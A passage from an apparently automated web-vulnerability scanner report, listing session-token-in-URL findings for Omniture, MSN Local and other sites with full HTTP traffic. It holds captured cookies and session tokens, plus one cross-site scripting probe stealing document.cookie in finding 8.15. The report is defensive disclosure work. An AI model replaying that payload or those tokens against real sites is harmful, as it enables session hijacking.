Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; safariAlertWasDisplayed=1

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Accept-Ranges: bytes
ETag: W/"6252-1288895544000"
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Type: image/jpeg
Content-Length: 6252
Date: Wed, 02 Feb 2011 19:00:38 GMT
Server: Test & Target

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................c.y..
...[SNIP]...

8.10. https://admin.testandtarget.omniture.com/skins/omniture/login.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/login.css

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/login.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/login.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=8DF6A9910E66EA873F576D8BD1CA8ED9

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=83BF34C0FE16352BA07ED364F7AB5210; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 19:00:36 GMT
Server: Test & Target
Content-Length: 4659

.loginInput {
font: 8pt arial, "lucida console", sans-serif;
color: #293431;
}

.bd {
font-weight: bold;
}

.mid {
font-size: 10pt;
}

#logo_header {
height: 90px;
width: 100%;
backgroun
...[SNIP]...

8.11. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/static_header.css

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/static_header.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/static_header.css;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Connection: keep-alive
Referer: https://admin.testandtarget.omniture.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US; v1stsp=C92D8F8B772AFF13; JSESSIONID=8DF6A9910E66EA873F576D8BD1CA8ED9

Response

HTTP/1.1 200 OK
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 19:00:36 GMT
Server: Test & Target
Content-Length: 8727

fieldset,img{border:0;}
address,caption,cite,code,dfn,em,strong,th,var{font-style:normal;font-weight:normal;}
ol,ul {list-style:none;}
caption,th {text-align:left;}
h1,h2,h3,h4,h5,h6{font-size:100%;f
...[SNIP]...

8.12. https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/terms_of_use.html

Issue detail

The URL in the request appears to contain a session token within the query string:

https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9

Request

GET /skins/omniture/terms_of_use.html;jsessionid=8DF6A9910E66EA873F576D8BD1CA8ED9 HTTP/1.1
Host: admin.testandtarget.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=A6B763B3ABABD72824B234D53FCB7A18; s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; safariAlertWasDisplayed=1; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Test & Target
Cache-Control: no-cache
Content-Type: text/html
Date: Wed, 02 Feb 2011 19:18:13 GMT
Expires: Wed, 31 Dec 1969 19:00:00 EST
Pragma: No-cache
Accept-Ranges: bytes
ETag: W/"13561-1288895544000"
Connection: close
Last-Modified: Thu, 04 Nov 2010 18:32:24 GMT
Content-Length: 13561

<html>

<body>
<pre>
ADOBE TERMS OF USE
Your access to this website (the "Site"), Content (as defined below), and/or the applications and services provided by Adobe Systems Incorporated, including its
...[SNIP]...

8.13. http://api.demandbase.com/api/v1/ip.json previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://api.demandbase.com
Path:	/api/v1/ip.json

Issue detail

The URL in the request appears to contain a session token within the query string:

http://api.demandbase.com/api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse

Request

GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 02 Feb 2011 15:39:29 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 53

demandbase_parse({"isp":true,"ip":"173.193.214.243"})

8.14. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.15. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&hostname=www.astaro.com&location=%2Fnewsletter&url=http%3A%2F%2Fwww.astaro.com%2Fnewsletter%3Fuid%3D90d583b---24cb6%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E78300d896e1&sessionID=1296568529575.85210&fpc=fa38af9-12dddaf19a7-13ff2714-2&ts1296568534215.0&r_sessionID=&hash_flag=&shr=&count=1

Request

GET /pview?event=pview&publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&hostname=www.astaro.com&location=%2Fnewsletter&url=http%3A%2F%2Fwww.astaro.com%2Fnewsletter%3Fuid%3D90d583b---24cb6%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E78300d896e1&sessionID=1296568529575.85210&fpc=fa38af9-12dddaf19a7-13ff2714-2&ts1296568534215.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.astaro.com/newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 01 Feb 2011 13:55:00 GMT
Connection: keep-alive

8.16. http://local.msn.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET / HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c3af7a7696394c059fb54ea07012ac32; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1C752DD9CA8D47F6B859932998A5A5A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX+boa&cat=270&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.17. http://local.msn.com/hourly.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/hourly.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /hourly.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a88927d5284b4f0db193dcb398666b00; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DE601FFA41DC4AE7A2ACD605FC555949; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:36 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.18. http://local.msn.com/movies-events.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/movies-events.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /movies-events.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c724f512793f40f7b545863d70887ae9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=91907563A38849D1A4E116FF013302D8; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 53547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.19. http://local.msn.com/news.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/news.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /news.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f947a926dcc6448ab9adb2fe46c957ce; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BA421F87D3D544989D735829E15D49E7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.20. http://local.msn.com/restaurants.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/restaurants.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /restaurants.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA26
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=55093cd8c86c4eec9aa83f4a411553a7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D4302824917C48BF812A10E485459A9D; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.21. http://local.msn.com/sports.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/sports.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /sports.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=91674b5e4f20471eb76593a1de875742; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=29EFBD9A51484401A707F30A0C1054D7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:31 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.22. http://local.msn.com/ten-day.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/ten-day.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /ten-day.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a493fc2dada348559f36f3b1b7ee2baa; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A97D30A3A7E74A1390F36B78341CB76F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.23. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.msn.com
Path:	/weather.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /weather.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f0bf2ff54ef24146a8f224ade917b784; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AD37BD0DAAF74A8193957788A235401B; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

8.24. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://millenniumhotels.tt.omtrdc.net
Path:	/m2/millenniumhotels/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

